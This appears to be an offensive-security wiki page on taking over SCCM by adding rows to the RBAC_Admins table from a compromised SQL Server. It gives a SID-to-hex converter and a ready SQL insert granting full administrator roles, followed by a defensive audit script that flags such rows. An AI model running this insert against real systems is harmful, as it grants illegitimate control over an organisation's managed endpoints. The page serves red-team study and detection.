# Add RBAC Admins

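Because the SCCM server runs on data stored in a SQL Server database, SCCM trusts the users stored in the RBAC Admins table of that database as its administrators.

If an attacker succeeds in obtaining administrator privileges on the SCCM server's SQL Server, they can manipulate the database and add new rows to the RBAC\_Admins table to take over SCCM administration.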

## Abuse

{% code title="hex ↔ SID conversion code" %}

```python
#!/usr/bin/env python3
import argparse
import struct
import re
import sys

# Decode a binary SID (hex, optional 0x prefix) into its S-1-... string form.
def hex_to_sid(hex_str: str) -> str:
    hex_str = hex_str.replace("0x", "").replace(" ", "").strip()
    data = bytes.fromhex(hex_str)
    revision = data[0]
    sub_authority_count = data[1]
    identifier_authority = int.from_bytes(data[2:8], 'big')
    sub_authorities = [struct.unpack("<I", data[8 + i*4:12 + i*4])[0] for i in range(sub_authority_count)]
    sid_str = f"S-{revision}-{identifier_authority}-" + "-".join(str(x) for x in sub_authorities)
    return sid_str

# Encode an S-1-... string SID into the 0x-prefixed binary form.
def sid_to_hex(sid_str: str) -> str:
    parts = sid_str.strip().split('-')
    if len(parts) < 4 or parts[0].upper() != 'S':
        raise ValueError("SID 형식이 올바르지 않습니다. (예: S-1-5-21-...)")
    revision = int(parts[1])
    identifier_authority = int(parts[2])
    sub_authorities = list(map(int, parts[3:]))
    data = bytearray()
    data.append(revision)
    data.append(len(sub_authorities))
    data += identifier_authority.to_bytes(6, 'big')
    for sub in sub_authorities:
        data += struct.pack("<I", sub)
    return "0x" + data.hex()

def main():
    parser = argparse.ArgumentParser()
    # "--input" gives the argument the dest name that args.input reads below.
    parser.add_argument("-i", "--input", required=True, help="Input SID or HEX")
    args = parser.parse_args()
    user_input = args.input.strip()

    try:
        if re.match(r'^(0x)?[0-9a-fA-F\s]+$', user_input):
            print(f"[+] 입력값은 HEX로 감지됨")
            print(f"SID → {hex_to_sid(user_input)}")
        elif user_input.upper().startswith("S-"):  
            print(f"[+] 입력값은 SID로 감지됨")
            print(f"HEX → {sid_to_hex(user_input)}")
        else:
            print("[-] 입력 형식이 올바르지 않습니다. SID 또는 HEX 값을 입력하세요.")
            sys.exit(1)

    except Exception as e:
        print(f"[-] 오류 발생: {e}")
        sys.exit(1)

if __name__ == "__main__":
    main()
```

{% endcode %}

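Use the Python code above to convert the SID of the domain account that is to be added as an SCCM administrator into hex. Insert the resulting hex value and the domain account into the query below, then run it on the SCCM server's SQL Server.

{% code title="RBAC\_Admins member registration query" %}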

```sql
INSERT INTO RBAC_Admins (AdminSID, LogonName, IsGroup, IsDeleted, CreatedBy, CreatedDate, ModifiedBy, ModifiedDate, SourceSite)
SELECT '<user-sid-hex>', '<domain\user>', 0, 0, '', '', '', '', '<site-code>'
WHERE NOT EXISTS ( SELECT 1 FROM RBAC_Admins WHERE LogonName = '<domain\user>' );

INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID)
SELECT (SELECT TOP 1 AdminID FROM RBAC_Admins WHERE LogonName = '<domain\user>'), RoleID, ScopeID, ScopeTypeID
FROM (VALUES ('SMS0001R', 'SMS00ALL', 29), ('SMS0001R', 'SMS00001', 1), ('SMS0001R', 'SMS00004', 1)) AS V(RoleID, ScopeID, ScopeTypeID)
WHERE NOT EXISTS (
    SELECT 1 FROM RBAC_ExtendedPermissions
    WHERE AdminID = (SELECT TOP 1 AdminID FROM RBAC_Admins WHERE LogonName = '<domain\user>')
      AND RoleID = V.RoleID AND ScopeID = V.ScopeID AND ScopeTypeID = V.ScopeTypeID
);
```

{% endcode %}
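Rows written this way differ from console-created administrators: the query above leaves `CreatedBy` and `ModifiedBy` empty, and the SID is not one that was approved through normal change control. The following audit sketch is an added example, not code from the original page; it assumes `RBAC_Admins` rows have been exported as dictionaries keyed by the column names used in the query, and the approved-SID baseline, SIDs and account names are constructed sample values.

```python
import struct

def hex_to_sid(hex_str):
    """Decode a binary SID given as hex (optional 0x prefix) into S-1-... form."""
    text = hex_str.strip()
    if text.lower().startswith("0x"):
        text = text[2:]
    data = bytes.fromhex(text)  # raises ValueError on non-hex input
    if len(data) < 8 or len(data) != 8 + 4 * data[1]:
        raise ValueError("length does not match sub-authority count")
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack(f"<{data[1]}I", data[8:])
    return "-".join(["S", str(data[0]), str(authority)] + [str(s) for s in subs])

def audit_rbac_admins(rows, approved_sids):
    """Return (LogonName, SID, reasons) for every row that needs review."""
    findings = []
    for row in rows:
        reasons = []
        try:
            sid = hex_to_sid(row["AdminSID"])
        except ValueError as exc:
            sid = None
            reasons.append(f"undecodable AdminSID: {exc}")
        if sid is not None and sid not in approved_sids:
            reasons.append("SID not in approved baseline")
        # The insert shown on this page leaves both audit columns empty.
        for column in ("CreatedBy", "ModifiedBy"):
            if not (row.get(column) or "").strip():
                reasons.append(f"empty {column}")
        if reasons:
            findings.append((row["LogonName"], sid, reasons))
    return findings

# Constructed sample data: SIDs, account names and the baseline are made up.
SID_PREFIX = "0x010500000000000515000000010000000200000003000000"  # S-1-5-21-1-2-3-
SAMPLE_ROWS = [
    {"AdminSID": SID_PREFIX + "f4010000", "LogonName": "CONTOSO\\sccmadmin",
     "CreatedBy": "CONTOSO\\sccmadmin", "ModifiedBy": "CONTOSO\\sccmadmin"},
    {"AdminSID": SID_PREFIX + "50040000", "LogonName": "contoso\\test",
     "CreatedBy": "", "ModifiedBy": ""},
]
APPROVED_SIDS = {"S-1-5-21-1-2-3-500"}

if __name__ == "__main__":
    for logon, sid, reasons in audit_rbac_admins(SAMPLE_ROWS, APPROVED_SIDS):
        print(f"[!] {logon} ({sid}): {'; '.join(reasons)}")
```

Run on a schedule against a fresh export, this surfaces administrators that were added directly in the database rather than through the console.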

## Demo

<figure><img src="/files/xqLjPaOKKK6agMno593y" alt=""><figcaption></figcaption></figure>

## References

{% embed url="<https://www.truesec.com/hub/blog/sccm-tier-killer>" %}


